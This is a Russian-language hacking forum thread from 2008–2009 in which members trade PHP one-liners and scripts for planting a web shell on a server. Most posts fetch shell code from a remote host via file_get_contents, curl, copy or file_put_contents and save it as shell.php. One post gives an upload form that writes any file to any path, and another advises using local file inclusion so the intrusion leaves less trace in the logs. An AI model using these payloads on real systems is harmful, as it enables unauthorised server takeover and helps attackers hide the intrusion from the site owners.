PhP скрипт заливающий шелл

Discussion in 'PHP' started by CyBeR_MaE$tR0, 9 Jan 2008.

  1. CyBeR_MaE$tR0

    CyBeR_MaE$tR0 New Member

    Joined:
    18 Mar 2005
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    :)
     
    #1 CyBeR_MaE$tR0, 9 Jan 2008
    Last edited: 1 May 2010
    1 person likes this.
  2. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    PHP:
    <?
    $shell=file_get_contents('http://server/shell.txt') or die('can\'t download shell');
    $fp=fopen('shell.php','wb') or die('can\'t fopen()');
    fwrite($fp,$shell);
    fclose($fp);
    ?>
     
    #2 Macro, 9 Jan 2008
    2 people like this.
  3. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Если ОС никсы и SAFE_MOD=OFF и установлен CURL, то можно так:
    PHP:
    <?php
    system    ("CURL http://site.ru/shell.txt > shell.php");
    ?>
    Также можно поизвращаться с WGET.
    А вообще самый правильный вариант, это что предложил Macro :).
     
    #3 А®ТеS, 9 Jan 2008
    2 people like this.
  4. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    или так(уже с формой, может я тебя не правильно понял):
    PHP:
    $path $_SERVER['DOCUMENT_ROOT'];
    $uplouder = <<<HERE
    <html><head><META http-equiv=Content-Type content="text/html; charset=windows-1251">
    <title> Загрузка файлов на сервер </title></head>
    <body>
    <h2><b> Форма для загрузки файлов </b></h2>
    <form action="upload.php" method="post" enctype="multipart/form-data">
    Путь к файлу на сервере
    <input type="text" name="new_path" value =     $path><br>
    Имя файла на сервере
    <input type="text" name="new_name" value = "uploud.php"><br>
    <input type="file" name="filename"><br>
    <input type="submit" value="3aгpyзитьтb"><br>
    </form>
    </body>
    </html>
    HERE;
    $uploadfile= @$_POST['new_path'] . "/" . @$_POST['new_name'];
    if (    move_uploaded_file(@$_FILES['filename']['tmp_name'], $uploadfile))
    {
    echo     "Файл успешно загруженн, он доступен по этому пути:" $uploadfile ;
    }
    else 
    {
    echo     $uplouder;


     
    #4 AkyHa_MaTaTa, 9 Jan 2008
    3 people like this.
  5. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    351
    Likes Received:
    193
    Reputations:
    3
    Да что так заливать шелл сложно на форум - нет смысла переименовывать, так как php файл на форум же залить сложно
     
    #5 ZEXEL, 13 Jan 2008
  6. keeberg

    keeberg Banned

    Joined:
    5 Jan 2008
    Messages:
    39
    Likes Received:
    27
    Reputations:
    -15
    PHP:
    <body bgcolor="EEEEFF">
    <font color="red">
    <center><h1>


    <?php 
    $ok     "Чувак! Ты залил шелл, на этот сервак! :)";
    $no "Облом!!! нету прав на запись.";
    if(    copy("http://www.pr0gram.nm.ru/shell.php""./shell.php")) echo "$ok"; else echo "$no";
         ?>


    </h1><center>
    </font>
     
    #6 keeberg, 13 Jan 2008
  7. X-FRITS

    X-FRITS Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    57
    Likes Received:
    81
    Reputations:
    7
    сори что поднимаю тему, но есть еще один отличный способ, одной строкой:
    PHP:
    file_put_contents('shell.php',file_get_contents('http://site.com/shell.txt'));
    Работает везде.
     
    #7 X-FRITS, 17 Jul 2009
  8. _==wolf==_

    _==wolf==_ Elder - Старейшина

    Joined:
    29 May 2008
    Messages:
    127
    Likes Received:
    38
    Reputations:
    6
    эмм. а что такое серванты?
     
    #8 _==wolf==_, 17 Jul 2009
  9. FireFenix

    FireFenix Elder - Старейшина

    Joined:
    3 Jun 2009
    Messages:
    390
    Likes Received:
    115
    Reputations:
    23
    от слова сервер
     
    #9 FireFenix, 17 Jul 2009
  10. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    угу а еще copy('http://site.com/shell.txt','shell.php'); и еще 5 тысыч способов, я б минусовал за такое ей богу :mad: .
     
    #10 PaCo, 17 Jul 2009
  11. X-FRITS

    X-FRITS Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    57
    Likes Received:
    81
    Reputations:
    7
    Интересно за что это бы ты минусовал?? Если этот способ никто не написал, и я не скопипастил.
    А то что способ легкий и если ты его знаешь, это не значит что его знают все.
    P.S. я считаю что ты мог бы и промолчать, так как твой пост был неуместен.
     
    #11 X-FRITS, 28 Jul 2009
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    щаз, везде. ЛОЛ!!!

    Только если allow_url_fopen=on

    Практически всегда лучше юзать локальные формы загрузки, имхо

    RFI - это вообще палево. Палево вашего сервака с шеллом. Даже если есть RFI всё-равно всегда лучше юзать LFI-версию загрузки. Всё ж в логах остается, если вы не уверены, что порутаете сервак
     
    #12 Pashkela, 28 Jul 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.